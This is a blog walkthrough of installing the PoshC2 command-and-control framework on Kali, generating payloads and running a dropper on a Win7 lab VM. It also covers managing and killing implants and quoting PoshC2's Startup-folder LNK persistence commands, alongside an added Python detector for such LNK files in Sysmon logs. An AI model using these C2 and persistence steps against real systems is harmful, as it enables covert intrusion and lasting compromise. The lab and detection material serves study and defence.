0 Environment

System:

Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux

Project URL (PoshC2-7.3.0):

https://github.com/nettitude/PoshC2

Documentation:

https://poshc2.readthedocs.io/en/latest/install_and_setup/index.html

1 Installation

┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# sudo ./Install.sh

2 Create a project (by default, projects are created under /var/poshc2/)

┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-project -n howareyou
[+] Created Project: howareyou
[*] Now run posh-config to set your configuration

3 Configuration
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-config

4 Start the server (this generates the various payloads, stored in /var/poshc2/howareyou/payloads)
┌──(root💀kali)-[/home/kali/Desktop/PoshC2-7.3.0]
└─# posh-server

5 Move one of the payloads to the desktop, then copy it to the Win7 virtual machine and run it (in another window)

┌──(root💀kali)-[/var/poshc2/howareyou/payloads]
└─# mv Posh_v2_dropper_migrate_x64.exe /home/kali/Desktop


6 Create a user (in another window)
┌──(root💀kali)-[/var/poshc2/howareyou/payloads]
└─# posh -u crashovverid

7 Implant checks in

8 Interaction

9 Interaction output

10 Close the sessions and exit

Other:

01 Deleting sessions
=============== PoshC2 Zip ===============

User: crashovverid

[5] : Seen:2021-02-01 20:16:01 | PID:2572 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[6] : Seen:2021-02-01 20:16:20 | PID:2580 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[8] : Seen:2021-02-01 21:09:06 | PID:2560 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS
[9] : Seen:2021-02-01 21:09:08 | PID:2720 | 5s | URLID: 1 | WIN-NS5MF2INI14\win7 @ WIN-NS5MF2INI14 (AMD64) PS

Select ImplantID or ALL or Comma Separated List (Enter to refresh):: 5,6,8,9
5,6,8,9> kill-implant
Are you sure you want to terminate the implant ID 5? (Y/n) Y
Are you sure you want to terminate the implant ID 6? (Y/n) Y
Are you sure you want to terminate the implant ID 8? (Y/n) Y
Are you sure you want to terminate the implant ID 9? (Y/n) Y

5,6,8,9> quit
Are you sure you want to quit? (Y/n) Y

┌──(root💀kali)-[/var/poshc2]
└─#

02 Second window (create a user to interact)
posh -u crashoverride

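// Interaction example
PoshC2 can create a LNK file and place it directly in the Windows Startup folder to maintain persistence. This technique can be invoked by running the following commands: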
* Persistence (with powershell.exe):
====================================
install-persistence 1,2,3
remove-persistence 1,2,3
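
A defender-side check for the Startup-folder LNK persistence described above, as an added example that is not part of the original post or of PoshC2: it scans Sysmon Event ID 11 (FileCreate) records for .lnk files written into a Startup folder and raises the severity when the writer is a script host. The sample events, the `Updater.lnk` and `Vendor.lnk` names and the script-host list are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Per-user and all-users Startup folders, matched case-insensitively.
STARTUP_LNK = re.compile(
    r"\\(users\\[^\\]+\\appdata\\roaming|programdata)"
    r"\\microsoft\\windows\\start menu\\programs\\startup\\[^\\]+\.lnk$",
    re.IGNORECASE,
)
# Assumed list: processes that seldom have a legitimate reason to write there.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
STARTUP = r"\Microsoft\Windows\Start Menu\Programs\Startup"

# Constructed records that use Sysmon FileCreate (Event ID 11) field names.
SAMPLE_EVENTS = [
    {"EventID": 11, "UtcTime": "2021-02-01 20:17:02.114",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\win7\AppData\Roaming" + STARTUP + r"\Updater.lnk"},
    {"EventID": 11, "UtcTime": "2021-02-01 20:18:40.002",
     "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\win7\Desktop\Notes.lnk"},
    {"EventID": 11, "UtcTime": "2021-02-01 20:25:11.530",
     "Image": r"C:\Users\win7\Downloads\setup.exe",
     "TargetFilename": r"C:\ProgramData" + STARTUP + r"\Vendor.lnk"},
    {"EventID": 1, "UtcTime": "2021-02-01 20:26:00.000",
     "Image": r"C:\Windows\System32\cmd.exe"},
]

def find_startup_lnk(events):
    """Return one finding per .lnk created inside a Startup folder."""
    findings = []
    for ev in events:
        target = ev.get("TargetFilename", "")
        if ev.get("EventID") != 11 or not STARTUP_LNK.search(target):
            continue
        writer = basename(ev.get("Image", "")).lower()
        findings.append({
            "time": ev["UtcTime"],
            "writer": writer,
            "shortcut": basename(target),
            "severity": "high" if writer in SCRIPT_HOSTS else "review",
        })
    return findings

if __name__ == "__main__":
    for f in find_startup_lnk(SAMPLE_EVENTS):
        print(f)
```

Shortcuts written by installers still surface as "review", so the same query doubles as a baseline of what normally lands in the Startup folders.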

 

Related links:

Windows Persistence (Part 4): Shortcuts
System Security, Bypass007, 2019-12-04
https://www.secpulse.com/archives/119973.html

 

posted on 2021-02-02 11:26 by 雨点点